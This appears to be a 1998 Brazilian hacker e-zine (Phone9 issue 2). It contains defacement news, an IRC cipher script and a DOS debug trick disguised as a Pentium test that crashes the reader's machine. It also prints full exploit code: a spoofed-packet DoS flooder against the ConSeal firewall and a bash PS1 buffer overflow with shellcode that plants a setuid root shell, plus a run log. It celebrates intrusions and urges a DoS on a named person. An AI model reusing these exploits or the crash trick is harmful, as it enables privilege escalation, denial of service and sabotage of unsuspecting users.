P h o n e 9 (c) 1 9 9 8 p r o d u c t i o n s reg - (r) none rights reservaded. __ __/\______\ \_ ________ ________ _______ ___/\_ \__ // \/ \__\___ /____\__ _/ _ \ // -- / [-]\ __/ \ /_ / /_____\___. / _/ ___/___/ \_ __/\____/ /______ /__/ // \/----/ /_____\\___/ //____/ /____\____/ [c] P h o n e 9 (c) p r o d u c t i o n s. the phone9 communications, - http://www.phone9.org .... .... Phear Yer Phone, 01 de novembro de 1998. Phone9 Communications edicao no.02| phone9@phone9.org systems, Inc. [P9] ------------------------------------------------------------------ [P9] [m o l e c u l e s] [face your phear] [s e l u c e l o m] [gigant robots] [intergalatik kriminal] Bem vindo a mais uma edicao da Phone9, .[ektoplazma.] editors: kleptomaniak - bloodroot --- --- P h o n e 9 c o m m u n i c a t i o n s s y s t e m s , i n c _____ ____ / _ \/ _ \ editor-in-chief: bloodroot|kleptomaniak [P] \ ___/\__ / co-editor: ]Puruc4[ [H] \ \.[P9]/ / layout: ]Puruc4[ [O] \/ \/ relacoes publicas: Dr. Eneas [PR0NA] [N] [the phone9] 31337: bahamas, paranoia, Cacaio [E] [systems.] askii efektiz: bloodroot - alph1x t3k [9] Phone9, Inc. +-- -- --- -- ---- --- --+ the evil empire .user| face your phear, Now!!! : '98 productions. [c] [Ph0ne9.] +--- --- --- - ----- --- --- -+ Punkass Stuffs The Phone9 Communications Systems, 1] .ph0ne9.sp0ts 2] 31337.ini, o IRC zkr1pt dos dUhd1nh4s - by bloodroot & paranoia 3] Conseal Firewall Killer - by k2 4] /bin/bash buffer overflow, cartas de amor para bash 5] Microsoft Internet Exploder BUG!!! Terceiro Passo: Paste the table below in you document. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Kevin Mitnick Contador: Este e' o tempo em que Kevin Mitnick, nao tem um julgamento cedido pelo governo americano. -- Recentemente varias listas de discussoes tem falado bastante sobre uma possivel conferencia hacker no Brasil, semelhante a DefCon e muitas outras por ai.. O pessoal da Bos e outros lugares estao tentando fazer um encontro deste tipo, datas, nomes, promovedores entre outros deta- lhes, ainda estao sendo organizados e nao tem data de estreia e nem de esperanca, por enquanto nos so ficamos na vontade de ter um encontro do tipo, por isso nos pedimos a colaboracao de quem puder contribuir com algo para o evento, servidores, empresas de seguranca, consorcios, bureaus de informatica e ate anonimos podem contribuir com esta campa- nha, apenas manda um email para: blood@puruca.com.br, que nos entrare- mos em contato com voces. Quanto a invasao da Mandioca, pelos camaradas da Nearz, eu achei uma boa atidude deles em mudar a pagina, ja que todos tinham acesso na man dic, mas ninguem tinha coragem de mudar o htm ou entao porque nao que- riam que o acesso ao servidor seria acabado, acabou que a nova dona da Mandioca, foi comprada pelo preco de uns bons megabytes de wordlists, espero que os administradores da mandic nao fiquem muito chateados com a frustacao que eles causaram no seu sistema. :) Voce pode contatar a nearz pelo endereco: http://members.tripod.com/nearz http://www.cyberspace.com/~nearz http://www.phone9.org/nearz --> Soon... http://www.microsoftz.com/nearz O bug do ano 2000, continua acabando com as maquininhas por ai :) Ele agora tambem afeta computadores que trabalham em pequenos escritorios como os das locadores de videos, que so tem 2 digitos no lugar do ano ao invez de 4. Vejamos como 4 numeros afetam a vida de muita gente, tem programador cobrando 30 dolares por linha de codigo mudada. Deve- rao sair muitos M$ deste negocio... anti-2000 Concept??? E para os moloides de carteria executem o seguinte e travem a sua ma- quinas que rodam pentium!!! hehehehehe... Para testar a vulnerabilidade do pentium no seu computador, faca o seguinte: no prompt do DOS: (obs. e' melhor que voce faca isto pelo DOS mesmo... :)) debug n debug.com a db f0 db 0s db c7 db c8 rcx 4 w Quando voce acabar de digitar este ultimo comando, entao voce sabe que o seu computador travou, e voce tera que reboota-lo dali :) [.m0td.] --- [ The End ] -- [.m0td.] 1998. (c) phone9.org .[news]. - breaking tha news - .[news]. [19/09] - Telerj finalmente reduz a tarifa em alguns servicos que ela oferece, como: O valor da instalacao de novas linhas e o plano de expansao, teve uma reducao no seu preco tambem. As reducoes na instalacao de linhas caiu de $147,99 para o ainda alto $82,25. O preco dos telefones comprados no plano de expansao teve uma reducao de 45,65%, o que torna o preco de $142,68 reais para $77,54 e os novos lerdos das telerdas tambem terminaram com a cobranca de levar a linha, da cai- xa de verificacao (armario), ate a caixa do predio e assim por diante ate a casa do usuarios. Eu acho que finalmente vou poder colocar aquela LP na minha casa :) ?!?! [02/09] - Site filial ao da nasa.gov, foi invadido por raquers, o grupo HFG 'Hacking for Girlies' tem ultimamente feito a cam panha de purificacao dos sites. :)Invadindo sites que eles possam ter em mente. Na lista dos atacados estao os: nytimes.com|jpl.nasa.gov, entre outros. [06/09] - A MANDIoCa, foi invadido pelo NearDz, mudando a pagina ofi- cial da mandic ( index.html), se voce quiser ver a pagina hackeada da nova dona da mandic, va em: - deathknights.com/phone9/mandioca.html [14/09] - Slashdot, o centro de informacoes para linux nerds, foi in- vadido recentemente por um dUhD1nhas chamado de H4G1S, este ninja, foi o mesmo que invadiu o nasa.gov em 97. O que e' mais interessante na sua invasao é que durante a invasao da nasa, ele clamou por justica nos casos do BernieS e Mitnick desta vez ele manda um simples e puro "fuck kevin mitnick" e uma penca de outros caras. [13/09] - New York Times Hackeado, pelo grupo HFG, em protesto contra a grande investida na midia, implicando que mitnick seja um ladrao moderno, o ataque foi dedicado a John Markoff, o es- critor do livro sobre mitnick takedown e' o jornalista mais estupido, que fez toda a difamacao contra mitnick durante a sua procura. [16/09] - X-ploit, grupo hacker mexicano, invadiu mais um site gover- namental do mexico, realmente nao tenho muito informacao so bre o motivo da invasao, mas voces sabem, derrepente sera a resulreicao do exercito zapatista na internet??? Frase muito comum do grupo x-ploit: "O mexico e' para os me xicanos, a internet e' para o Xploit." [19/09] - Chico.com.br, foi hackeado por um dos membros da Phone9, Puruca o site foi invadido em protesto ao lamer, que se dizia o racker do momento, sendo ele e a mae dele, um bando de lamers de merda Voce pode ver a pagina hackeada em www.puruca.com.br/chico.html [21/09] - Testemunho do clinto e' mostrado na TV em mais de 400 canais si multaneamente no mundo todo... Espero que ele nao tenha respon- dido a questao sobre o tamanho do bigulhim dele. ;) [01/10] - Lancado o askii pack da Phone9, feito por alph1x t3k e b_root, Este pode ser achado em: puruca.com.br/phone9/askiiat.txt [30/10] - Crai.com.br, hackeada por Fak, que deixou uma mensagem para nos e para o pessoal da microsoftz.cjb.net!!! bloodroot bloodroot@webcrunchers.com [Gettin' seek of being weirdo] [being a 'especial' dude] ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³2 - 31337.ini, o script elitaum para IRC ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by paranoia & b_root ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° O pessoal da Udigrudi, criou um script elitaum para IRC, que faz com que suas letras fiquem mais 31337 que nunca. Assim voce pode assustar os ratoes que existem pela net. :) O 31337.ini, faz parte da campanha de produtos desenvolvidos pela Campanha, Salvem as formigas do Sul do Paquistao, que esta associado com a microsoft.com e e' claro com o sistema (011)1406 e o 'Ligue Jah.', entao em mais uma producao 31337 nos apresentamos 31337.ini, o script elitaum... thanx to: paranoia - alquem K. naoseioque Gay Bom, por enquanto nesta edicao nos oferecemos duas funcoes para o zkr1pt, a primeira e': Transformar a sua escrita para 31337, e a segunda e encrip tar as conversas no IRC. -- 31337.ini -- para todos os dUhD1nHas ai fora, b1tch3z f0r j00z!! n0=ele { n1= say :::::> zkr1pt elitaum 2000, 31337.ini <::::: n2= say ::::::> 0 2kr1p7 313374um d0 br4211 <::::::: n3= say :::::::::[ http://www.phone9.org ]:::::::::: n4= say ::::::::::|by paranoia|bloodroot|::::::::::: n5= say ----- 5173 elitaum -> udigrudi.org <- ------ n6= set %var.textl *1 n7= set %var.textl $replace(%var.textl,e,3) n8= set %var.textl $replace(%var.textl,i,1) n9= set %var.textl $replace(%var.textl,a,4) n10= set %var.textl $replace(%var.textl,s,5) n11= set %var.textl $replace(%var.textl,t,7) n12= set %var.textl $replace(%var.textl,o,0) n13= set %var.textl $replace(%var.textl,l,1) n14= set $var.textl $replace(%var.textl,g,9) n15= set $var.textl $replace(%var.textl,z,2) n16= set $var.textl $replace(%var.textl,k,/{) n17= set $var.textl $replace(%var.textl,y,j) n18= set $var.textl $replace(%var.textl,elite,31337) n19= set $var.textl $replace(%var.textl,eleet,31337) n20= set $var.textl $replace(%var.textl,eleeti,313371) n21= say %var.textl n22=} n23=Decrypto{ n24=set %encrypto *1 n25=%encrypto = $replace(%encrypto,^,.) n26=%encrypto = $replace(%encrypto,*,?) n27=%encrypto = $replace(%encrypto,»,!) n28=%encrypto = $replace(%encrypto,ë,a) n29=%encrypto = $replace(%encrypto,¥,b) n30=%encrypto = $replace(%encrypto,£,c) n31=%encrypto = $replace(%encrypto,",d) n32=%encrypto = $replace(%encrypto,ç,e) n33=%encrypto = $replace(%encrypto,ô,f) n34=%encrypto = $replace(%encrypto,³,g) n35=%encrypto = $replace(%encrypto,í,h) n36=%encrypto = $replace(%encrypto,|,i) n37=%encrypto = $replace(%encrypto,¬,j) n38=%encrypto = $replace(%encrypto,%,k) n39=%encrypto = $replace(%encrypto,½,l) n40=%encrypto = $replace(%encrypto,m,®) n41=%encrypto = $replace(%encrypto,å,n) n42=%encrypto = $replace(%encrypto,¡,o) n43=%encrypto = $replace(%encrypto,¤,p) n44=%encrypto = $replace(%encrypto,«,q) n45=%encrypto = $replace(%encrypto,²,r) n46=%encrypto = $replace(%encrypto,µ,s) n47=%encrypto = $replace(%encrypto,¶,t) n48=%encrypto = $replace(%encrypto,©,u) n49=%encrypto = $replace(%encrypto,¢,v) n50=%encrypto = $replace(%encrypto,·,w) n51=%encrypto = $replace(%encrypto,`,x) n52=%encrypto = $replace(%encrypto,ß,y) n53=%encrypto = $replace(%encrypto,ä,z) n54=/echo 4 %encrypt n55=} n56=Encrypto { n57=set %encrypto *1 n58=%encrypto = $replace(%encrypt,.,º) n59=%encrypto = $replace(%encrypt,?,±) n60=%encrypto = $replace(%encrypt,!,») n61=%encrypto = $replace(%encrypt,a,ë) n62=%encrypto = $replace(%encrypt,b,¥) n63=%encrypto = $replace(%encrypt,c,£) n64=%encrypto = $replace(%encrypt,d,“) n65=%encrypto = $replace(%encrypt,e,ç) n66=%encrypto = $replace(%encrypt,f,ô) n67=%encrypto = $replace(%encrypt,g,³) n68=%encrypto = $replace(%encrypt,h,í) n69=%encrypto = $replace(%encrypt,i,|) n70=%encrypto = $replace(%encrypt,j,¬) n71=%encrypto = $replace(%encrypt,k,%) n72=%encrypto = $replace(%encrypt,l,½) n73=%encrypto = $replace(%encrypt,m,®) n74=%encrypto = $replace(%encrypt,n,å) n75=%encrypto = $replace(%encrypt,o,¡) n76=%encrypto = $replace(%encrypt,p,¤) n77=%encrypto = $replace(%encrypt,q,«) n78=%encrypto = $replace(%encrypt,r,²) n79=%encrypto = $replace(%encrypt,s,µ) n80=%encrypto = $replace(%encrypt,t,¶) n81=%encrypto = $replace(%encrypt,u,©) n82=%encrypto = $replace(%encrypt,v,¢) n83=%encrypto = $replace(%encrypt,w,·) n84=%encrypto = $replace(%encrypt,x,`) n85=%encrypto = $replace(%encrypt,y,ß) n86=%encrypto = $replace(%encrypt,z,ä) n87=say %encrypto $+ (zkr1pt 31337 2000.) n88=} -- 31337.ini -- para todos os dUhD1nHas ai fora, b1tch3z f0r j00z!! 31337.ini, toda a edicao da Phone9, um novo update do 31337.ini by paranoia, e alguem K. Gay, e com novos updates do bloodroot. dUhD1Nh45, os idiotas por tras de todo o plano mal feito =) 7h3 31337 & 7h4 dUhD1Nh45!!! by paranoia - bloodroot. [blood@phone9.org]|[paranoia@phone9.org] ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³3 - Conseal Firewall Killer ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by k2. ³°° ÀÄÄÄÄÄÄÄÄÄÄÙ°° ConSeal firewall killer by k2. O firewall Conseal da signal9 (signal9.com), tem uma vulnerabilidade nas sua estruturas, permitindo que voce possa fechar o firewall por meio de um ataque DoS, e' bem util na hora de mandar pacotes obscu- ros para usuarios de win95/98, a empresa ainda nao lancou nenhum mas e' seguramente recomendavel que voces usem outro firewall pessoal (nao recomendo nenhum, ipfwadm???). O bug se divide em duas partes, na primeira ele explora a opcao 'learning' do firewall, da qual novas novas regras de tratamento de pacotes do firewall sao adaptados, um grande flood no IP que roda o firewall, assim a cada pacote especial, novas regras serao adaptadas, ate' que o numero de regras fique cheio ai o firewall fecha e o sistema reboota. A segunda parte do bug, se a opcao de logar todos os ataques, entao voce pode mandar um flood de ataques que este ira logar todos, se a quantidade for extensiva de pacotes for o suficiente para lotar o HD da vitima, caso isto acon teca, entao o programa fecha e provavelmente o sistema ira rebootar;) Veja o codigo abaixo. by Noc-Wage. --[ consealdos.c ]-- #include #include #include #include #include #include #include #include #include #include #include #ifdef BROKEN_LIBC #include #else #define u_char unsigned char #define u_short unsigned short #endif struct sockaddr sa; int main(int argc,char **argv) { int fd; int x=1; int hosti=192; int hostii=168; int hostiii=1; int meep=0; int fooport=1; int numpack=0; char funhost[15]; struct sockaddr_in *p; struct hostent *he; u_char gram[36]= { 0x45, 0x00, 0x00, 0x26, 0x12, 0x34, 0x00, 0x00, 0xFF, 0x11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x00, 0x12, 0x00, 0x00, '3','1','3','3','7','8','9','0' }; if(argc!=3) { fprintf(stderr,"Saihyousen, by Noc-Wage\n"); fprintf(stderr,"The faster your connection to the internet is (latency wise, not bandwidth)\n"); fprintf(stderr,"and the lower the CPU speed of the victim will\nincrease probability of success\n"); fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen 127.0.0.1 40000\n",*argv); exit(1); }; if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) { perror("requires RAW SOCKETS"); exit(1); }; #ifdef IP_HDRINCL if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #else fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n"); #endif /* The stuff below is so that it's not fully sequential i.e 100.100.100.101, 100.100.100.102 */ for (numpack=0;numpack<=atoi(argv[2]);numpack++) { if (meep==0) { ++hosti; meep++; } if (hosti>254) hosti=1; if (meep==1) { ++hostii; meep++;} if (hostii>254) hostii=1; if (meep==2) { ++hostiii; meep=0;} if (hostiii>254) hostiii=1; sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti); (he=gethostbyname(funhost)); bcopy(*(he->h_addr_list),(gram+12),4); if((he=gethostbyname(argv[1]))==NULL) { fprintf(stderr,"can't resolve destination hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+16),4); fooport++; /* resets the port to 1 if it's nearing the end of possible values */ if (fooport>65530) {fooport=1;}; *(u_short*)(gram+20)=htons((u_short)fooport); *(u_short*)(gram+22)=htons((u_short)fooport); p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr)); if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1) { perror("sendto"); exit(1); }; /* printf("Packet # %i\n", numpack); */ /* Turn that on to see where you are.. it'll slow the attack though */ }; printf("Attack against %s finished", argv[1]); putchar('\n'); return 1; } --[ consealdos.c ]-- Para se proteger contra este tipo de ataque e' bem simples, apenas deshabilite as opcoes de 'log attack' e 'new rules', assim o fire- wall fica seguro contra estes tipos de ataques... ;) obs: phineas usa conseal, DoS nele!!!! heheheh k2@phone9.org - k2@microsoftz.com ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³4 - /bin/bash buffer overflow, cartas de amor para bash ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot. ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Bom, recentemente alguem com um nome muito estranho (hihihi!), descobriu um buffer overflow dentro do /bin/bash, que ocorre quando a opcao '\w' quando dentro do PS1. Eis o codigo do exploitito: --[ code -tp.c- ]-- #include char code[] = "\xeb\x24" /* jmp GETADDR */ /* RUNPROG: */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xfe\x06" /* incb (%esi) */ "\xfe\x46\x04" /* incb 0x4(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* incl %eax */ "\xcd\x80" /* int $0x80 */ /* GETADDR: */ "\xe8\xd7\xff\xff\xff" /* call RUNPROG */ ".tmp.tp"; /* Program to run .XXX.XX */ int ADDR=0xbffff2ff; void main(void) { char dir[256]; int i, align; printf("BASH '\w' opcao PS1 buffer overflow.\n"); printf("- Criando /tmp/tp.c\n"); system("echo 'main() {' > /tmp/tp.c"); system("echo 'system(\"cp /bin/sh /tmp/sh\");' >> /tmp/tp.c"); system("echo 'system(\"chmod +s /tmp/sh\");' >> /tmp/tp.c"); system("echo '}' >> /tmp/tp.c"); printf("- Compilando /tmp/tp.c to /tmp/tp\n"); system("gcc -o /tmp/tp /tmp/tp.c"); printf("- Removendo /tmp/tp.c\n"); system("rm -f /tmp/tp.c"); /* Computing alignment for the 'address' directory */ getcwd(dir,255); align=(strlen(dir)+2) % 4; memset(dir,'A',255); dir[255]=0; printf("- Criando dir. AAA.../AAA.../AAA.../CODE.../ADDR...\n"); mkdir(dir,0777); chdir(dir); mkdir(dir,0777); chdir(dir); mkdir(dir,0777); chdir(dir); /* create directory which name is our code */ mkdir(code,0777); chdir(code); /* create directory which name is return addresses */ for(i=align;i<252;i+=4) *(int *)&dir[i]=ADDR; mkdir(dir,0777); chdir("../../../../"); printf("- OK.\n\n"); } --[ code -tp.c- ]-- rode isto como usuario normal do sistema: [raquerzao]:~$ id uid=1000(reqUer) gid=1000(raqUer) groups=1000(test) [raquerzao]:~$ ./bashps1 BASH '\w' opcao PS1 buffer overflow. - Criando /tmp/tp.c - Compilando /tmp/tp.c to /tmp/tp - Removendo /tmp/tp.c - Criando diretorios AAA.../AAA.../AAA.../CODE.../ADDR... - Ok. Agora provavelmente voce devera ter o tp.c no seu diretorio /tmp. [raquerzao]:~$ ls -l /tmp/tp -rwxr-xr-x 1 test test 3981 Sep 4 20:54 tp Entao como r00t rode: bash# export PS1='bash:\w\$ ' debian:~# cd ~/reqUer debian:/home/reqUer# cd AAAAAAAA*/*/*/*/* shell-init:couldnotgetcurrentdirectory:getwd:cannotaccessparentdirectories shell-init:couldnotgetcurrentdirectory:getwd:cannotaccessparentdirectories Entao a bash morre (sniff ;)) ai, é facil, [raquerzao]:~$ ls -l /tmp/sh -rwsr-sr-x 1 root root 304676 Sep 4 20:55 sh Mas espere, nao é so issu!!! Se voce ligar (011)1406, voce podera adiquirir esta linda carta de amor para o tcsh, outra exclusivida de das empresas elitaum de deus ;) Bom, a mesma coisa funciona com o /bin/tcsh... Trusted Cshell??? I dont think soo :) Bom, de qualquer modo no tcsh, e' possivel voce instalar um patch para que esta carta de amor para de chegar ao seu sistema,.abaixo --- tcsh-6.07.06.orig/sh.dir.c +++ tcsh-6.07.06/sh.dir.c @@ -78,7 +78,7 @@ char path[MAXPATHLEN]; - tcp = (char *) getwd(path); + tcp = (char *) getcwd(path, MAXPATHLEN); if (tcp == NULL || *tcp == '\0') { xprintf("%s: %s\n", progname, path); if (hp && *hp) { @@ -549,7 +549,8 @@ } #endif /* apollo */ - (void) strcpy(ebuf, short2str(cp)); + (void) strncpy(ebuf, short2str(cp), MAXPATHLEN); + ebuf[MAXPATHLEN-1]=0; @@ -1061,7 +1062,7 @@ #endif /* apollo */ continue; /* canonicalize the link */ } -#endif /* S_IFLNK */ +#endif /* S_IFLNKXYZ */ if (slash) *p = '/'; } @@ -1096,7 +1097,8 @@ /* * Start comparing dev & ino backwards */ - p2 = Strcpy(link, cp); + p2 = Strncpy(link, cp, MAXPATHLEN); + link[MAXPATHLEN-1]=0; found = 0; while (*p2 && stat(short2str(p2), &statbuf) != -1) { if (DEV_DEV_COMPARE(statbuf.st_dev, home_dev) && @@ -1119,7 +1121,7 @@ cp = newcp; } } -#endif /* S_IFLNK */ +#endif /* S_IFLNKXYZ */ #ifdef apollo if (slashslash) { @@ -1255,7 +1257,9 @@ return (0); } } - (void) Strcpy(s, dp->di_name); + + (void) Strncpy(s, dp->di_name, MAXPATHLEN); + s[MAXPATHLEN-1]=0; return (1); } --- codigo por: MiG. texto por: bloodar00tou. /bin/bash buffer overflow. by - reg (c) blood@puruca.com.br ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³5 - Microsoft Internet Exploder BUG!!!